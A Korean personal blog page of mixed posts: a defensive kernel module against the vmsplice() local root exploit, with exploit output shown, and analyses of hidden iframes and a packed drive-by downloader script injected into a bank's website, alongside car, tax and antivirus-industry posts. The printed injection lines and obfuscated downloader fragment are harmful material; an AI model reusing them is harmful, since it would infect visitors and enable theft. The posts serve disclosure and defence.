Real Geeks

커널모듈을 통한 vmsplice() local root exploit 취약점에 대한 방어 모듈

시스템/IT/탐나는정보들
커널모듈을 통한 vmsplice() local root exploit 취약점에 대한 방어 모듈 제작 공개
by hkpco(wowhacker&wowcode)

오늘(2/11) 우연히 vmsplice() root exploit이 공개된것을 보고 커널모듈을 통한 패치를 만들었습니다.

현재까지 kernel 2.6 버전대에서 root exploit이 2개나 공개되었고, 그에대한 패치는

sys_vmsplice() 내부에서 호출되는 몇가지 함수들의 내부에 kernel api인 access_ok()를 사용해서

속성을 체크하는 루틴을 추가시키는 것으로써 예를들면 다음과 같습니다.

--- linux-2.6.orig/fs/splice.c
+++ linux-2.6/fs/splice.c
@@ -1237,6 +1237,9 @@ static int get_iovec_page_array(const st
                if (unlikely(!base))
                        break;

+                if (unlikely(!access_ok(VERIFY_READ, base, len)))
+                        break;
+

또 하나는 vmsplice() system call을 제거하는 방법입니다.

하지만, 두가지 방법 모두 커널을 다시 컴파일 해야하는 단점이 있습니다.

그래서 간단한 방어모듈을 제작해 봤습니다.

현재까지 나온 패치방법은 모두 커널 소스코드를 수정해야 하며,

외국에선 아래 커널 함수들을 수정하는 형태로 공개되었습니다.

vmsplice_to_pipe(), vmsplice_to_user(), get_iovec_page_array(), copy_from_user_mmap_sem()


그런데 위 함수들은 다음과 같은 순서로 호출됩니다.

-------
sys_vmsplice() -> vmsplice_to_pipe() -> get_iovec_page_array() -> copy_from_user_mmap_sem()
or
sys_vmsplice() -> vmsplice_to_user()
-------


그리고 각 kernel api들을 패치할 때 추가되는 루틴은 위 함수들에서 공통적으로 적용되는 인자값이기 때문에

아예 sys_vmsplice()에서 해당 인자값들을 체크하도록 한다면 취약점을 방어할 수 있습니다.

아래는 방어모듈 소스 코드와 이를 컴파일 하기위한 Makefile 입니다.

------------------------------
http://hkpco.kr/code/vmpatch.c
http://hkpco.kr/code/Makefile
------------------------------


다음은 방어모듈을 로드하기 전에 exploit을 테스트 한 결과입니다.

==========================
vmplice local root exploit
==========================

[hkpco@localhost ~]$ id
uid=500(hkpco) gid=500(hkpco) groups=500(hkpco) context=root:system_r:unconfined_t:SystemLow-SystemHigh

[hkpco@localhost ~]$ gcc -o vm_exploit vm_exploit.c
[hkpco@localhost ~]$ ./vm_exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f85000 .. 0xb7fb7000
[+] root

[root@localhost ~]# id
uid=0(root) gid=0(root) groups=500(hkpco) context=root:system_r:unconfined_t:SystemLow-SystemHigh


다음은 방어모듈을 로드하는 과정입니다.

====================
protect module patch
====================

[root@localhost hkpco]# wget http://hkpco.kr/code/vmpatch.c
--05:32:18--  http://hkpco.kr/code/vmpatch.c
Resolving hkpco.kr... 220.80.107.55
Connecting to hkpco.kr|220.80.107.55|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2287 (2.2K) [text/plain]
Saving to: `vmpatch.c'

100%[====================================================================================>] 2,287       --.-K/s   in 0s

05:32:18 (62.0 MB/s) - `vmpatch.c' saved [2287/2287]

[root@localhost hkpco]# wget http://hkpco.kr/code/Makefile
--05:32:33--  http://hkpco.kr/code/Makefile
Resolving hkpco.kr... 220.80.107.55
Connecting to hkpco.kr|220.80.107.55|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210 [text/plain]
Saving to: `Makefile'

100%[====================================================================================>] 210         --.-K/s   in 0s

05:32:33 (12.2 MB/s) - `Makefile' saved [210/210]

[root@localhost hkpco]# ls
Makefile  vmpatch.c

[root@localhost hkpco]# make
make -C /lib/modules/2.6.18-1.2798.fc6/build SUBDIRS=/root/hkpco modules
make[1]: Entering directory `/usr/src/kernels/2.6.18-1.2798.fc6-i586'
  CC [M]  /root/hkpco/vmpatch.o
/root/hkpco/vmpatch.c: In function 'get_sys_call_table':
/root/hkpco/vmpatch.c:57: warning: assignment makes pointer from integer without a cast
  Building modules, stage 2.
  MODPOST
  CC      /root/hkpco/vmpatch.mod.o
  LD [M]  /root/hkpco/vmpatch.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.18-1.2798.fc6-i586'

[root@localhost hkpco]# ls -l vmpatch.ko
-rw-r--r-- 1 root root 109481 Feb 11 05:42 vmpatch.ko

[root@localhost hkpco]# insmod vmpatch.ko


다음은 방어모듈을 로드한 후에 다시 익스플로잇을 적용시켜본 모습입니다.

==========================
vmplice local root exploit
protect module loaded
==========================

[hkpco@localhost ~]$ id
uid=500(hkpco) gid=500(hkpco) groups=500(hkpco) context=root:system_r:unconfined_t:SystemLow-SystemHigh

[hkpco@localhost ~]$ gcc -o vm_exploit vm_exploit.c
[hkpco@localhost ~]$ ./vm_exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f85000 .. 0xb7fb7000
[-] vmsplice: Bad address

[hkpco@localhost ~]$ id
uid=500(hkpco) gid=500(hkpco) groups=500(hkpco) context=root:system_r:unconfined_t:SystemLow-SystemHigh


익스플로잇이 실패한것을 볼 수 있습니다.

리눅스 커널 배포판이 다양하고 커널 소스코드도 각 배포판마다 부분적으로 수정되기 때문에

시스템 콜 제어를 통한 방어모듈은 모든 리눅스 커널에서 적용되지는 못합니다.

!! 해당 커널모듈 코드는 2월에 출간될 와우스토리에서 Linux Kernel 2.6 Rootkit(제가씀ㅎㅎ) 이라는 주제로

소개되는 내용에서 설명하는 방법을 이용하고 있습니다


http://wowhacker.com/BoArD/view.php?id=wow_free&page=1&sn1=&divpage=2&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=8014

남대문 화재 붕괴

AB형의 GEEK
끄적거리기...

오늘 저녁,, 대학로 가는길... 남대문을 보았다.

웬지 사진으로 담고 싶더라...

언제 복원할것이며,,,, 마지막사진을 함께 했었더라면 하는 생각이...

내가 지나긴 시간이 8시 30분경... 대학로에 갈갈이 홀에

갈옥쇼가 끝날무렵이니까.... 내가 지나가고 8시 50분경에 불이 났으니...

그때 사진찍었으면,, 마지막 사진이 될 뻔했당

'AB형의 GEEK' 카테고리의 다른 글

포르쉐 카이엔 GTS (Cayenne)  (0) 2008.02.25
김혜연 - 참아주세요 가사  (1) 2008.02.18
부가가치세 신고 관련  (0) 2008.01.25
R35 GTR 흰색 강남 탐엔탐스 앞  (0) 2008.01.22
R35 GTR 주행 데이터  (0) 2008.01.20

하나은행 홈페이지에 악성코드

시스템/IT/탐나는정보들
엇그제 하나은행 홈페이지에 악성코드가 심어져있다라는 글을 남긴적이 있다.

http://www.carstory.co.kr/468


아직도 그대로 방치되고 있고, 현재는 실시간에도 걸리지 않는다.

그리고 몇일 후 인데, 현재 그 악성코드 심어놓은것에 대한 패턴을 바꾸어서

N사의 실시간 탐지에도 걸리지 않고, 웹상에 그대로 방치가 되고 있다.

ocument.write("<iframe width=0 height=0 src=http://news.max3gp.com/news.htm></iframe>");
document.write("<iframe width=0 height=0 src=http://news.max3gp.com/rss.htm></iframe>");
document.write("<iframe width='0' height='0' src='http://news.max3gp.com/dd.htm'></iframe>");
~

하나은행 홈페이지에서 css.js 로 연결이 되어 눈속임으로 처리하였고
위 내용으로 되어져 있는걸 보면, 저 코드 삽입자가 주소를 바꾸고 코드를
수정한것을 알수가 있다.

참고로 news.htm의 코드

사용자 삽입 이미지



코드 내용은 몇일전 포스팅한 내용의 거의 유사하다

http://www.carstory.co.kr/468 참고하길



하나은행 인터넷 뱅킹 홈페이지에 악성코드가?

시스템/IT/탐나는정보들

오늘 토요일이다.

새벽 5시경... 웬지 하나은행에 잔액을 확인하고싶어서 들어갔는다
여기저기.. 둘러보던중..

평상시 이것저것 백신을 많이 사용하고 있는데, 오늘은 N사의 백신 경고창이 떠주신다

속으로 에이... 하나은행인데.. iframe이 혹시 박혀있나? 아니겠지..

그래도 치료는 해야지.. 궁금한대?

이런말들을 중얼중얼 거리면서, 마우스 클릭을 시작해주신다

내컴퓨터에 받아진 파일은 main.js

사용자 삽입 이미지


이런 창이 하나가 떳다

사용자 삽입 이미지

내용은 " Trojan-Downloader.HTML.IFrame.ec "

대충 머 홈피에 주로 중국쪽 공격자들이 Iframe 박아서, 자기들이 원하는 프로그램같은
걸 설치해서 먼가를 하려고 하는것

(주로 DDoS 공격모듈도 있고, 광고프로그램 설치되기도하고,, 기타 다양한것들..)

자.. 그렇다면 한번 추적을 해보고싶다.

난 하나은행 고객이다. 내가 쓰는 인터넷 뱅킹이며, 시작할때 유명한 보업업체들의

프로그램들이 쫙쫙 깔린다. <물론 역할마다 분야가 다르겠지만>

일단 보안통신모듈이 설치되고, My Firewall 이라는 작은 방화벽이 하나 깔리고

키보드 보안이라고 안티키로거가 설치가 되고, 머 이것저것 다양하게도 깔린다

컴퓨터가 무거워지도록 말이다. 그런것들을 설치하지 않으면 뱅킹을 할수없는것이

조금 마음에 들진 않지만, 고객을 위한것이니 기꺼이 설치를 해줘야한다.

일단, 어디에 iframe이 깔려있나 확인은 해봐야것다.

애초의 목적은 정상적인데 N사의 백신이 오탐을 하지 않나에서 시작이 된다.

웹소스코드를 보는중.. 느낌가는곳.. 발견

사용자 삽입 이미지

여기를 보면

<iframe src="http:// www.etimes.net/extranews/hanabank/main.asp" width="480" height="75" scrolling="no" frameborder="0"></iframe>

이 부분이 의심..

그리고 접속을 해보았다.

사용자 삽입 이미지

역시 이곳이군..

국내에 있는 이타임즈라는 뉴스 사이트이며, 하나은행에 뉴스를 공급하고 있나보다
저 이타임즈 사이트는 들어가자마자 메인에서 바로 감염될수있으니 접속은 하지않는것
이 역시 좋다

어째거나 하나은행 사이트에서 보여지고 있고, 하나은행 사용자는 저 페이지에 계속

노출이 되고있다.

자 그럼 저 사이트에는 어떤 코드가?

사용자 삽입 이미지

<script src="http://lovekr.super2b.com/main.js"></script>
<iframe width=0 height=0 src='http://218.38.28.68/i/i/ip.htm'></iframe>

main.js와
ip.htm 이 수상하지 않는가?

위주소는 접속하면 아무런 내용이 없고 아래 IP로 된 주소는 페이지가 사라진듯싶다
IP주소로 된곳은 어디인가?
직접 들어가보니 유명 사이버대학교 홈페이지이다

사용자 삽입 이미지

왜 저사이트가 여기에 ip.htm이라는 파일로 iframe으로 박혀있는지는 대충 의심만간다.
혹시 저기도?

자 그럼 위에서 나왔던 lovekr.super2b.com에 있는 파일을 보자..

참고로 저런 파일들은 리눅스에서 wget으로 받아서 보려고 리눅스에 로그인..

[root@localhost test]# wget http://lovekr.super2b.com/main.js
--05:35:28--  http://lovekr.super2b.com/main.js
           => `main.js'
Resolving lovekr.super2b.com... 218.234.23.95
Connecting to lovekr.super2b.com|218.234.23.95|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 283 [application/x-javascript]

100%[====================================>] 283           --.--K/s            

05:35:28 (44.94 MB/s) - `main.js' saved [283/283]

..
..
..
이런식으로 다 받았음


우선 하나은행에서 바로 연결되서 보이는 main.js 파일을 보자

document.write("<iframe width=0 height=0 src=http://lovekr.super2b.com/news.htm></iframe>");
document.write("<iframe width=0 height=0 src=http://lovekr.super2b.com/rss.htm></iframe>");
document.write("<iframe width='0' height='0' src='http://lovekr.super2b.com/dd.htm'></iframe>");

대충 봐도 알겠지만, lovekr 어쩌고하는 수상한 사이트에 news.htm rss.htm dd.htm
파일에 접촉을 하게 된다.

그래서 다 받아버린다

[root@localhost test]# ls
dd.htm  main.js  news.htm  rss.htm
[root@localhost test]#

위에서 부터..

news.htm
---------------------------------------------------------------------
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p
..
..
중략(대충 분위기보면 좀 그렇지않은가? haoqiang 이라는 이름도보이고..)
..
..
\\C\\b","");3="";h.1D=1;3="";r.1C("\\1A\\N\\q",J,0);3="";r.1B();3="";j=L(1t);3="";a o=d.p("\\u\\6\\l\\7\\9\\5\\7\\E\\1h\\c\\H\\7\\f\\4\\u\\X\\8\\5\\4\\b\\1s\\t\\K\\4\\6\\5","");3="";a D=o.1k(0);3="";j=o.W(D,j);3="";h.1j();3="";h.1i(r.1m);3="";h.1n(j,2);3="";h.1r();3="";a T=d.p("\\u\\R\\4\\f\\f\\c\\n\\9\\9\\f\\7\\6\\C\\5\\7\\g\\E","");3="";U=o.W(D+\'\\Q\\Q\\8\\X\\8\\5\\4\\b\\i\\B\',\'\\6\\b\\k\\c\\4\\S\\4\');3="";T.1q(U,\'\\1p\\1o\\6 \'+j,"","\\g\\9\\4\\E",0);3=""}1E(V){V=1}3="";',62,103,'|||haoqiang|x65|x74|x63|x69|x73|x70|var|x6D|x2E|Gf|x30|x6C|x6F|Ss|x33|ufeiure|x64|x72||x41|Fs|CreateObject|x54|Xx|x36|x62|x53|x2D|x43|x2f|x2e|x35|x39|x32|x61|pmeds|x6E|iojiij|x4D|x46|x31|omed|x6A|nnneffd|Math|x45|x6f|x44|x5C|x68|x78|Eo|fdfdeeee|iiiii|BuildPath|x79|createElement|setAttribute|x3A|x42|document|x77|x6c|x6d|x76|x75|x6b|x6e|function|x7E|round|x3a|return|random|try|x67|Write|Open|GetSpecialFolder|x38|responseBody|SaveToFile|x2F|x20|SheLLExecute|Close|x4F|9999|x4C|x58|x66|x34|x48|x50|x47|send|open|type|catch'.split('|'),0,{}))
</SCRIPT>

다른 파일들역시..

rss.htm 도
<sCrIpT lAnGuAgE="jAvAsCrIpT">
eval(function(p,a,c,k,e,d){e=function(c) 요딴식으로 시작하고
나이가 나이인만큼 귀찮은건 잘 안하게 되므로 일일이 풀어보긴 싫다

dd.htm도 마찬가지 좀 분위기가 중국놈들이 장난하는듯한 분위기이며

<script language="javascript" src="http://count1.51yes.com/click.aspx?id=11559482&logo=12"></script>

요딴대로 이동하는 코드도 있고.. 대충 분위기 보면 알지않는가
물론 상세하게 분석해보면 아닐수도, 저런류의 코드는 정황상 좋을 수가 없다.

대략 지금까지 보면
시니리오 대충 그려보면

중국해커? -- 은행 사용자 공격을 위해 검토?--> 하나은행사이트 <-- 사용자 접속 -> 감염
                                  이타임즈사 뉴스 링크 확인  <---|
이타임즈사 공격 후 iframe 박아버림   <--------|

만약, 그 iframe을 통하여 설치된 프로그램이, 인터넷 뱅킹 취약점을 이용하여
해당 사용자가 돈을 이체할때 겉으로는 본인이 원하는 곳이지만 실제로는 공격자가
원하는 계좌로 돌려놓는 프로그램을 심었다면, 돈이 공격자가 원하는 곳으로만
가지 않나 하는 생각도 들었다.

최종적으로 하나은행에 다른곳에 어딘가에 더 있을지 여부는 모르겠지만
"소호마스터즈 클럽" 이라는 곳에 적어도 지금은 보지 않는것이 좋겠다.
특히 안전장치가 없는 사람이라면 더더욱이.. 조심해야겠다.


그냥 혹시 다른 궁금한 사람들이 있지 않을까 하는 마음에 포스팅으로 기록해보았다.

p.s) 하나은행 자체에 대한 취약한 부분이 아니고 다양한 연결고리 속에 한곳이 취약하므로
      그곳과 연결된 다양한 곳들에 대해 피해를 입힐수 있다라는 그러한 부분을 알리고싶어
      포스팅을 해본다.
다르게 생각하면 난 해당 은행사 고객이며, 탐지를 하지 않았더라면
      옆에 있는 백신이 없는 컴퓨터를 이용했더라면 당했을것이다.
      이런것이 백신의 중요성이 아니겠는가? 실시간탐지의 매력이기도 하다



      저 페이지를 고칠때까지 저 페이지를 접속하지 않는것을 권장합니다.
     고쳤다면, 댓글하나 남겨주시는 센스 발휘해주세요...

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

그레디 트러스트 댐퍼(쇼바) with 전자식 컨트롤러

마이 카스토리/R34
http://www.carstory.co.kr/453
예전에 올린 제품설명..

드디어 한국도착!!
사용자 삽입 이미지
사용자 삽입 이미지
사용자 삽입 이미지
사용자 삽입 이미지
사용자 삽입 이미지
사용자 삽입 이미지

우선 컨트롤러의 실내 동작 모습.. 동영상이며 볼륨을 최대로!!

 

부가가치세 신고 관련

AB형의 GEEK

1 세금계산서상의 부가가치세액은 환급대상입니다

2. 신용카드매입전표는 해당 은행의 사이트에 들어가시면 사용내역 다 구할수 있습니다. 관련 사업자 등록번호도   가능합니다.

   신용카드매입전표등(국세청발행 현금영수증 포함) 이 부가가치세 매입세액으로 인정될려면 몇가지 요건이 모 두  갖춰져 있어야 합니다

    1)  구입거래처가 일반사업자 이어야 함 ( 국세청 사이트의 조회로 가면 사업자 유형 조회에 해당 사업자 등록  번호 넣으면 나옵니다)

    2)  식사대, 사무용품, 명함관련 항목은 매입세액 공제대상입니다.

3. 사업을 준비하는 기간에 사업자들에게는 환급이 발생하는 경우가 많습니다.
    그러니 환급 받으십시요.  경우가 되면 갑근세도 환급받는 경우가 생기죠^^

4. 통장은 가능하면 사업용을 전용으로 쓰면 좋구요,  위 경우에 세무서에서 문제 삼으면 있는 그래로 소명하시면 문제 없을 듯 합니다.

5.  짐차, 벤, 9인승이상 승합차, 경차만 기름값 매입세액 공제대상 입니다.

6. 증빙서류는 나중에 조사때 모두 자료로 보여줘어야 합니다.  보통 신고기한 경과일로부터 5년간 보관 의무 있습니다.  그리고 부가가치세는 사업자등록번호로 서로 크로스체크가 가능한항목 입니다. 즉 판매한 사람도 똑같이 신고 하기에 전산으로 바로 확인 가능합니다.

7. 일반적으로 카드사용금액의 총액은 부가가치세가 포함되어 있습니다.
   예를 들어 식대를 5000 원 카드로 결제하면 455 원 정도가 부가가치세이고 식대는 4,545 원이 되죠

8. 현금영수증을 받더라도 매입세액이나 나중에 경비로 인정받는 것은 사업과 관련된 것만 인정됩니다. 예를 들어 개인적용도로 옷을 구입한 경우 매입세액공제대상도 소득세 관련 비용인정도 않되는 항목이죠



오늘까지임.. 난 1월2일부터인데 신고하나?

'AB형의 GEEK' 카테고리의 다른 글

김혜연 - 참아주세요 가사  (1) 2008.02.18
남대문 화재 붕괴  (2) 2008.02.11
R35 GTR 흰색 강남 탐엔탐스 앞  (0) 2008.01.22
R35 GTR 주행 데이터  (0) 2008.01.20
향기나는 집...  (1) 2007.12.20

무료 백신의 실체?

카테고리 없음
보통 무료백신들을 잘보아라, 자기네 툴바를 설치하려고 한다.

툴바로 멀하는데? 툴바로 자기네들에 무료 백신 대신에 해서 수익을 공급해준다.

N모사의 경우, 툴바로 자기네 사이트로 검색결과든 쇼핑이던 머든 트래픽을 모은다

그자체로도 엄청난 수익을 낼수있다.

A사의 경우도 마찬가지, 무료백신에 대해서 아주 대중적으로 다가갔다, 역시나

자기네 툴바의 설치다. 앞으로 각자회사의 툴바 전쟁이 시작될 것 같다.

무료 백신이라고 해서, 무료가 아니라는거... 알아두길 바래요~

또 한가지는

ZDnet 기사중에.. "무료백신 바람도 사무실은 빗겨간다 "

라는게 있다.

그 아래

요즘 유행하는 실시간 무료백신을 회사PC에 설치할 생각인가? 만약 그렇다면 큰 낭패를 보기 전에 기업용 정품 유료백신을 사용할 것을 권한다

맞는말임

기사 내용을 보면..

기업고객 수익 지키기에 업계 안간힘

21일 보안업계에 따르면 기업들의 백신 불법사용에 대한 제제 강도가 더 커질 것으로 전망되고 있다. 무료백신 광풍으로 개인 사용자 시장이 거의 사장된 가운데, 기업시장에서 나오는 수익 중요성이 높아졌기 때문이다. 혹시라도 불법 사용 때문에 기업시장마저 가라앉는다면 국내 사업은 아예 포기해야 한다.

물론, 어느 정도 규모 기업들이 라이선스 없는 백신을 사용할 가능성은 희박하다. 네트워크상의 통합보안관리를 비롯한 필수 서비스를 받을 수 없기 때문. 하지만 SMB 기업 중 적지 않은 수는 아직도 ‘어둠의 경로(?)’를 통해 백신을 사용하는 것이 현실이다.

소프트웨어저작권협회(이하 SPC)가 발표한 국내 SW침해 현황에서 지난해 상반기 불법이라 단속된 백신/보안 제품 수량은 2,901개로 전체분야에서 4위를 차지했다. 업계는 이런 기업들이 무료백신 열풍에 편승, 안 그래도 부족한 ‘돈 내는 습관’이 더 없어질 것을 우려하는 것이다. 결국 사전 조이기 작전에 나선다는 설명.

백신업체 관계자는 “그동안은 소규모 업체들까지는 영향력이 미치지 못했지만 앞으로는 다를 것”이라며 “기업시장에서의 수익을 지키기 위한 강력한 방안들을 적극 모색하고 있다”고 밝혔다.

백신업체가 SW저작권협회에 단속정보 제공

그렇다고 백신 혹은 다른 SW 업체라도 직접 단속권을 가진 건 아니다. 실제 단속은 검찰, 경찰, 체신청 등이 하는데 백신업체로부터 불법사용 정보를 신고받은 SPC가 이를 지원한다.

SPC가 단속에 사용하는 DB ‘Audit’에는 백신업체들이 제공한 제품정보가 담겨있기도 하다. 현장에서 이 DB를 돌렸을 때 같은 제품이 발견됐으나 라이선스가 없다면 불법사용으로 간주되는 것이다.

이스트소프트 김명숙 과장은 “기업들의 백신 불법사용 단속을 위해 SPC와 면밀히 협력하고 있다”며 “Audit에 대한 제품정보 제공도 그 일환”이라고 밝혔다.

참고로 안철수연구소 오석주 대표, 하우리 김희천 대표는 SPC 이사를 역임하고 있으며, 이스트소프트 윤태덕 이사도 인증위원을 맡고 있다.

만약, 이런 단속에 적발되면 그간 불법 제품을 사용한데에 대한 벌금을 내고, 정품 구입까지 해야 한다. 과징금은 건수에 따라 다르나 상습적인 경우 5년 이하 징역 또는 7,000만원 이하 벌금에 처해질 수 있다(컴퓨터프로그램보호법 47조 의거).

허나 불법행위 수위가 약하다면 해당 백신업체의 합의로 비교적 원만히 해결할 수도 있다. 뉴테크웨이브 조재형 이사는 “합법적 영역 안에서 SPC와 상관없이 실무진간 직접 협상으로 합의점을 찾을 수 있다”고 밝혔다.

기업고객 잡기 경쟁 심화될 듯

한편, 기업 사용자들에게 희소식도 있다. 백신업체들은 위처럼 수익원 지키기와 함께 영역싸움을 위한 서비스 및 가격 경쟁도 열을 올릴 것이다.

우선, 기업시장에 첫 발을 내딛는 알약은 이미 공격적인 가격 경쟁의 신호탄을 터트렸다. 기업 백신 정식 오픈을 전 예약 고객에게는 30% 할인가를 적용한다며 대대적으로 홍보하고 나서 기존 강자들을 긴장시키는 상황. 물론, 아직 해본 적이 없는 기업백신 서비스의 질은 뚜껑을 열어봐야 알겠지만 이스트소프트는 성공을 장담하고 있다.

안철수연구소는 네트워크 보안과 보안 관제 등의 라인업을 백신과 연계할 수 있음을 강조한다. 이를 통해 보다 신속하고 효율적으로 위협에 대응할 수 있도록 포지셔닝을 강화할 계획이다. 안철수연구소 관계자는 “그동안 구축한 통합보안능력을 살려 경쟁제품과 차별화 시키겠다는 전략을 세웠다”고 밝혔다.

뉴테크웨이브는 아직 침투하지 않은 악성코드를 찾아가서 미리 길목을 막는 서비스를 제공할 예정이다. 단순히 악성코드를 검출하고 치료하는 것이 아닌 신 개념 사전 예방 서비스로 알려졌다. 또 고객사 사용용도나 망의 구성에 따른 커스터마이징의 다양화도 모색하고 있다.

비록 이런 경쟁이 ‘제 살 깎기’ 형태로 이어질 것을 우려하는 목소리도 있지만, 기업 보안 담당자들에는 일단 환영할 일이다. 고객사들은 백신업체들이 건전한 경쟁으로 선택의 폭을 넓혀 줄 것을 기대하고 있다. @


김태정 기자 ( ZDNet Korea ) 님께서 써주신 기사 ;)

CIA에서 사이버공격으로 여러도시가 정전이 되었다 한다

AB형의 GEEK/이런저런말들
CIA가 여러 국가의 주요 국가 기반시설에 대한 사이버공격이 성공한 증거를
가지고 있다고 한다.

CIA 말 인용

"사이버공격은 미국 이외의 여러 지역에 전력 장비를 붕괴시키는 데 사용된 정보가 있다. 정전사태로 여러 도시가 피해를 입은 사례가 한 건 이상"이라는 것이다.

"미국 외부의 여러 지역에서 공익설비에 대한 사이버 침입 후 금품 요구가 뒤따랐다는 정보가 있다. 공격자의 일부가 내부 지식을 이용했다는 의심은 있지만 확언할 수는 없다"

Tom Espiner ( ZDNet UK )

에서 발췌한 CIA말의 인용이며,

개인적으로 생각하면, 아직 국가 기반 시설에 대한 사이버공격이 가능할런지에 대한
부분에 아직은 찝쩍대는 정도의 수준이라고 생각을 한다.

앞으로 미래에 어떠한 일들이 더 일어날지.. 그림도 그려지고 시나리오도 생각이
나는데, 그에 따른 관련된 단체나 연구기관에서 해결책을 잘 내놓으리라 생각한다.

p.s)
정전이 되려면, 전기를 차단해야하는데, 어떻게 전기를 차단했나? 단지 침입인데?
최종차단은 기계적설계로 본다면, 경기자동차든 집이든, 전력공급원이던 최종차단은
2중스위치의 하드웨어이다. 네트웍으로 억세스해서 할수있는게 아닌것 같다.

먼가의 방법을 이용했을까? 궁금하다

'AB형의 GEEK > 이런저런말들' 카테고리의 다른 글

구글..  (1) 2006.12.21
tistory로 이전하고...  (0) 2006.12.14

R35 GTR 흰색 강남 탐엔탐스 앞

AB형의 GEEK
은색, 검정색에 이어...

드디어 흰색이..

소문에 의하면 소닉에서 들여온 차량이라고 하는데,

사용자 삽입 이미지
사용자 삽입 이미지
국내 R35 GTR 들이 점점 늘어나고 있다.

아직까지 개인소유로 타고다니는 것은 본적이 없는듯....

인터넷 중고차 사이트에서 펌..

'AB형의 GEEK' 카테고리의 다른 글

남대문 화재 붕괴  (2) 2008.02.11
부가가치세 신고 관련  (0) 2008.01.25
R35 GTR 주행 데이터  (0) 2008.01.20
향기나는 집...  (1) 2007.12.20
부산 씨클라우드 호텔  (0) 2007.11.12